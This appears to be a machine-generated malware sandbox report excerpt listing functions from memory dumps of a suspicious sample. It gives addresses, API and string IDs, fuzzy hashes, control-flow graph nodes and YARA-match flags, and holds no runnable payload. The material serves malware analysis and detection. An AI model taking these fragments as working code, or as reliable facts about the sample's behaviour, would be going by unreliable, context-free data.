                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                  • API String ID: 3446177414-161242083
                                                                                                  • Opcode ID: e7383ed435ec4bf557ebb1731e8a202204e9d1480986d8b9ff0222ebcf83d3c8
                                                                                                  • Instruction ID: 44e445a79268ad849551604d31784cb55253c9cd286cb8a3fc3b366cf1e8e6ce
                                                                                                  • Opcode Fuzzy Hash: e7383ed435ec4bf557ebb1731e8a202204e9d1480986d8b9ff0222ebcf83d3c8
                                                                                                  • Instruction Fuzzy Hash: 0F71E5B5A01205DFEF05DF69C940BAEB7F4EB84308F54486DE906E7250E774AB82CB50
                                                                                                  Function 3251EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: db6943255955bb0416aeca36bb0d576e7cf6b82d1dcac5a8e896394c66effa2b
                                                                                                  • Instruction ID: 92858f18027f6398313a0a3ca1479ba850ea1f9e75ba995b53fdee6151bdbf8c
                                                                                                  • Opcode Fuzzy Hash: db6943255955bb0416aeca36bb0d576e7cf6b82d1dcac5a8e896394c66effa2b
                                                                                                  • Instruction Fuzzy Hash: C6E1CE75940708DFEF25CFA9C980A9DBBF1BF48354F20492AE846E7261DB71AA41CF50
                                                                                                  Function 32527A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 4281723722-0
                                                                                                  • Opcode ID: 76c3a718b72e2335a5b8bb7f948444888cef319d934122f9babfe4e71ce7684d
                                                                                                  • Instruction ID: 26ffe5448a949da7b2df5e7d4d9402cc5ad0f5e5ff8d2e1b7caf363c241af7fd
                                                                                                  • Opcode Fuzzy Hash: 76c3a718b72e2335a5b8bb7f948444888cef319d934122f9babfe4e71ce7684d
                                                                                                  • Instruction Fuzzy Hash: 9B312275E52268DFCB15DFA8D884AEEBBF1AB88321F10456AE911B7280DB305A41CF50
                                                                                                  Function 324F58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: 4ca32fe76ba305d34ad677b26874d7349fe01aebeb4d4f4a98a9d6e65f4ba8b0
                                                                                                  • Instruction ID: a30400d2bafe4fe6af973b660a8870ea732e713ef6e4e02822ee8dceb12c11ea
                                                                                                  • Opcode Fuzzy Hash: 4ca32fe76ba305d34ad677b26874d7349fe01aebeb4d4f4a98a9d6e65f4ba8b0
                                                                                                  • Instruction Fuzzy Hash: EA326975D00369EFEB25CF64C944BD9BBB0BF88304F0080EAD559A7241DBB69A85CF91
                                                                                                  Function 32598B90 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 298COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: ${Y2
                                                                                                  • API String ID: 0-4142145967
                                                                                                  • Opcode ID: 7ed60a9d6373fb78cc8eed86be49d52c49dfa04c49573ca50f54a88f050bd8ce
                                                                                                  • Instruction ID: 462b36a1bb3976a0d139bcf5b7a2c0197cb48269327be242347788b63856b085
                                                                                                  • Opcode Fuzzy Hash: 7ed60a9d6373fb78cc8eed86be49d52c49dfa04c49573ca50f54a88f050bd8ce
                                                                                                  • Instruction Fuzzy Hash: B3B19A71A093419FD710CF29D888B9BBBE5BF84754F505A6EF994CB290DB30DA04CB92
                                                                                                  Function 32524B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0$Flst
                                                                                                  • API String ID: 0-758220159
                                                                                                  • Opcode ID: cf265b73fb946d162943986ceaeae9803dffc198ce99b0b3974636ffbf4ebbb4
                                                                                                  • Instruction ID: 0016b13c3ded4eb21959b1c5a4aaccecebcc8ab673b081a9ec34562fe0468a8a
                                                                                                  • Opcode Fuzzy Hash: cf265b73fb946d162943986ceaeae9803dffc198ce99b0b3974636ffbf4ebbb4
                                                                                                  • Instruction Fuzzy Hash: 8B51BEB5A01744CFEB14DF98C484799FBF4EF44B9AF14942AD445AB2C0DBB09A81CB50
                                                                                                  Function 324EE67A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: ^N2
                                                                                                  • API String ID: 3446177414-58235054
                                                                                                  • Opcode ID: 861ffa102b1827625bc6682277f8058c4b40981f2cc11c29f6912d553a775ffb
                                                                                                  • Instruction ID: 1707777660aabe1d5089171aef4aee16fdd111905408a15576e548a60278e684
                                                                                                  • Opcode Fuzzy Hash: 861ffa102b1827625bc6682277f8058c4b40981f2cc11c29f6912d553a775ffb
                                                                                                  • Instruction Fuzzy Hash: 914180B9A00201DFE719CF2AC4805557BF5FF89B61B50846AEC09CB361DB71E991CB90
                                                                                                  Function 324EDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: 0$0
                                                                                                  • API String ID: 3446177414-203156872
                                                                                                  • Opcode ID: d4dc2e84cbd6673177c788f5f7c62192cca77966c9d68c9e29b3ad7ebef25274
                                                                                                  • Instruction ID: 75c1fd4e013108fd10a0643c9bb888847ebc0cb973bc1d0b2508d3cea3653300
                                                                                                  • Opcode Fuzzy Hash: d4dc2e84cbd6673177c788f5f7c62192cca77966c9d68c9e29b3ad7ebef25274
                                                                                                  • Instruction Fuzzy Hash: 8A415BB5608701DFD300CF28D444A5ABBE8BB89358F044A6EF989DB340D771EA45CB96
                                                                                                  Function 324EE880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: N2$mN2
                                                                                                  • API String ID: 3446177414-3949905462
                                                                                                  • Opcode ID: 842b3bbf6ea15da9bf8fbc65ab5b79a700ff963b169a607fd5a4a45b6b062013
                                                                                                  • Instruction ID: 0ce3218bb1acd3874bfcef27222c196b9dd8fb4ad481ecb16e03b7e54fc656f3
                                                                                                  • Opcode Fuzzy Hash: 842b3bbf6ea15da9bf8fbc65ab5b79a700ff963b169a607fd5a4a45b6b062013
                                                                                                  • Instruction Fuzzy Hash: B611B4B6A01218AFDF11CF98D885ADEBBB4FB4C361F104019F911B7240D775AA54CBA0

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2.3%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:3
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 12299 6256c0 12300 6256dd 12299->12300 12301 6256ec closesocket 12300->12301

                                                                                                  Executed Functions

                                                                                                  Function 00601267 Relevance: .2, Instructions: 157COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 23 601267-601273 24 601275-60128c 23->24 25 6012da-6012f1 23->25 26 601246-601248 24->26 27 60128e-601296 24->27 28 6012f3-6012f4 25->28 29 601298-6012a5 25->29 27->29 31 6012f6-6012ff 28->31 32 60133f-60135b 28->32 30 6012d1 29->30 30->25 33 601302-60132b 31->33 32->33 34 60135d-60136b 32->34 35 60132d-60132e 33->35 34->35 36 60136d-601374 34->36 37 601330-601331 35->37 38 60139f 35->38 39 601332-601333 37->39 40 601387-601390 37->40 41 6013a1-6013a4 38->41 42 6013a6 38->42 39->30 43 601335-60133e 39->43 44 601396-60139c 40->44 45 60145c-60145f 40->45 41->42 46 6013b0-6013e3 call 626ec0 41->46 42->46 43->32 44->38 49 6013e5-6013f5 call 623e10 46->49 50 6013f8-601413 call 623b60 46->50 49->50 54 601418-601423 50->54 55 601425-60142d 54->55 56 60143f 54->56 57 601441-601448 55->57 58 60142f-601435 55->58 56->57 60 601456 57->60 61 60144a-601450 57->61 58->57 59 601437-60143d 58->59 59->57 60->45 61->60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8941028eee6a55cf84ce46da09fdd4b9cdfaf8b40d80e110fe0f6389fa9e1ddc
                                                                                                  • Instruction ID: 2666ecb912e7cf8355d02f060617ce121d763dcd5f1ba49f94c00d40e2ec2aa7
                                                                                                  • Opcode Fuzzy Hash: 8941028eee6a55cf84ce46da09fdd4b9cdfaf8b40d80e110fe0f6389fa9e1ddc
                                                                                                  • Instruction Fuzzy Hash: B751D131988612ABC7299F34C888AE3F7EAFF47315F04062EE05A8F281D3329545CBD5
                                                                                                  Function 006256C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 6256c0-6256fa call 5febc0 call 626130 closesocket
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: closesocket
                                                                                                  • String ID:
                                                                                                  • API String ID: 2781271927-0
                                                                                                  • Opcode ID: 7a6603314e12e36ffbcd65ecf2981a90ffa6797e87b79ab539038720f5e3e3db
                                                                                                  • Instruction ID: d69673363a275d7673f5856851b332a0078764e2cd96066b47137343c781f007
                                                                                                  • Opcode Fuzzy Hash: 7a6603314e12e36ffbcd65ecf2981a90ffa6797e87b79ab539038720f5e3e3db
                                                                                                  • Instruction Fuzzy Hash: ABE08C762006147BC260FA59DC01EDB77ADDFC5310F404459FB09A7202CA31B92287F8

                                                                                                  Non-executed Functions

                                                                                                  Function 00606AD0 Relevance: 41.7, Strings: 33, Instructions: 427COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Z$ $!Y$!l$-q$/T$8H$:!$;$=$@$A^$D$GS$J$J$K$L$R$U$X$aJ$d$j$o$p$s$to$xT$}$L$[$|
                                                                                                  • API String ID: 0-1942597448
                                                                                                  • Opcode ID: 026fcc8da7655f588732f10409a8b30ded7d53ed1cf6a148acf5ce9f5956984a
                                                                                                  • Instruction ID: 123267039098ab7d94c5d9be7737dcb239c41a299a5be9a9725105143818d06d
                                                                                                  • Opcode Fuzzy Hash: 026fcc8da7655f588732f10409a8b30ded7d53ed1cf6a148acf5ce9f5956984a
                                                                                                  • Instruction Fuzzy Hash: 9A32B1B0D45229CBEB28CF44C9947DEBBB2BB45308F1081D9D5096B281C7B96EC9DF85
                                                                                                  Function 006025AE Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y_\
                                                                                                  • API String ID: 0-1403553263
                                                                                                  • Opcode ID: 4d53b56b07a2beb258f8b53df1fc325f7f0e028e19a9dbaf617c1271c73930c2
                                                                                                  • Instruction ID: a144efd14fa575a5381ced4701bbdb3b2178164f83857941ac46a129ab91e0b8
                                                                                                  • Opcode Fuzzy Hash: 4d53b56b07a2beb258f8b53df1fc325f7f0e028e19a9dbaf617c1271c73930c2
                                                                                                  • Instruction Fuzzy Hash: 8CF0DDA6A822525FDB1E5FA94C561CCF771ED47330300166ACC68AF2D2CB208043CB99
                                                                                                  Function 00602550 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y_\
                                                                                                  • API String ID: 0-1403553263
                                                                                                  • Opcode ID: 40bb612a1c3f4303449e63de0b91854fc0fd1d5d01edf2796c76b830b0f24c35
                                                                                                  • Instruction ID: cfd1fd2e5eba884802ac8f8b04c1c329327db0dca81681e4c0128d488444c7b3
                                                                                                  • Opcode Fuzzy Hash: 40bb612a1c3f4303449e63de0b91854fc0fd1d5d01edf2796c76b830b0f24c35
                                                                                                  • Instruction Fuzzy Hash: D1F059A7942A05AEC719DF6498411A8F7B0FE1A321B501AABC994EB222D7618003C705
                                                                                                  Function 00602580 Relevance: 1.3, Strings: 1, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y_\
                                                                                                  • API String ID: 0-1403553263
                                                                                                  • Opcode ID: 3f4d4e6818103ab86606e39b3da1e72d9a6371ea5d90a9a20e8e85da95b9765d
                                                                                                  • Instruction ID: 9a7c76ca60454809eaa394b71fdf0ee1e307e6b28cff4d4b2629d15cdc3fb008
                                                                                                  • Opcode Fuzzy Hash: 3f4d4e6818103ab86606e39b3da1e72d9a6371ea5d90a9a20e8e85da95b9765d
                                                                                                  • Instruction Fuzzy Hash: 7EE020577961112B571D6D8A9C220EDF315E94B7713C05711D965E71D1CF10C04783DD
                                                                                                  Function 006012BF Relevance: .1, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 35e07bea7b8b9f412cca71389c7feb0d641bbf466193ac3b62d3737de9943af1
                                                                                                  • Instruction ID: 7af91ad2353bd0c486f1d34ad7bc475749e4060182da115a1c72d059dd389c25
                                                                                                  • Opcode Fuzzy Hash: 35e07bea7b8b9f412cca71389c7feb0d641bbf466193ac3b62d3737de9943af1
                                                                                                  • Instruction Fuzzy Hash: 31113531DCD2A55EC3295F7448C5197BBAADE53354B2401AEC480DF4D2D311C447C3C6
                                                                                                  Function 00603851 Relevance: .0, Instructions: 11COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a1924b8a1ae5424196cd789fc9f19c51ca2f3658024730e582d0d48a8fe5c128
                                                                                                  • Instruction ID: 8eac1bf33da036a126aa1078dd8f7498f9b08cf6bec4bedc45e886fbb50f97b2
                                                                                                  • Opcode Fuzzy Hash: a1924b8a1ae5424196cd789fc9f19c51ca2f3658024730e582d0d48a8fe5c128
                                                                                                  • Instruction Fuzzy Hash: 2CA01123F820080000280C8A3A020B0E32AC2C3032E0232F3CE0CB30000823C820028C
                                                                                                  Function 0060322B Relevance: .0, Instructions: 11COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_5f0000_jbBlvVPHmIIgIHiOBCnstGcDCWhN.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7cbf4b3511f298f2ac589b85da928dface6d4b5e81fa88c034b727f4e1e23d31
                                                                                                  • Instruction ID: 4739d571d05dd45f17d6c9d1766b28dd8f3f52519e0c9eea95233e55d65d6490
                                                                                                  • Opcode Fuzzy Hash: 7cbf4b3511f298f2ac589b85da928dface6d4b5e81fa88c034b727f4e1e23d31
                                                                                                  • Instruction Fuzzy Hash: 32B01217E4950400C0304E0878000B5F378D18B136E207BE7CC4C734001553C01001CC